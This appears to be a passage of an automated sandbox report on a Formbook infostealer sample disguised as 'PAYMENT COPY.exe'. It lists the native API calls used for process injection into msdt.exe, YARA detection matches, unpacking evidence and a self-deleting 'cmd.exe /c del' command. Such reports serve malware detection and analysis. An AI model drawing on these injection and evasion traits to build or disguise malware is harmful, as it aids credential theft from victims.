          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B1A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B19760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8280 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE8300 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE827A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE83AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004046A7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041BDDE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B6E1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA20A8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB090
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91002
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF4120
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADF900
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA22AE
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0EBB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9DBD2
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2B28
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE841F
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD0D20
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2D07
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1D55
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA2EF7
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF6E30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA1FF1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C04E
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041C86A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B9EA
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C6B
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_00408C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DADFCE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D020A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DAE824
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D903DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEC86A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C6B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD8C70
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEBDDB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB6E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CDB150 appears 45 times
          Source: PAYMENT COPY.exe, 00000001.00000003.334044214.000000001F25F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@12/8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File created: C:\Users\user\AppData\Local\Temp\nsw3A72.tmp
Source: PAYMENT COPY.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PAYMENT COPY.exe | Virustotal: Detection: 32%
Source: PAYMENT COPY.exe | ReversingLabs: Detection: 27%
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File read: C:\Users\user\Desktop\PAYMENT COPY.exe
Source: unknown | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, msdt.exe
Source: Binary string: msdt.pdb source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Unpacked PE file: 2.2.PAYMENT COPY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: ek0j.dll.1.dr | Static PE information: section name: .code
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041CA81 push es; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041B47C push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041B412 push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041B41B push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041C656 push ss; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00415EF0 push ss; iretd
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_0041CFFA push BB2529E0h; iretd
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B2D0D1 push ecx; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_1_0041CA81 push es; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_1_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_1_0041B47C push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_1_0041B412 push eax; ret
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_1_0041B41B push eax; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D2D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AECA81 push es; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AEB3C5 push eax; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AEB41B push eax; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AEB412 push eax; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AEB47C push eax; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AE5EF0 push ss; iretd
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AEC656 push ss; ret
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_00AECFFA push BB2529E0h; iretd
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File created: C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
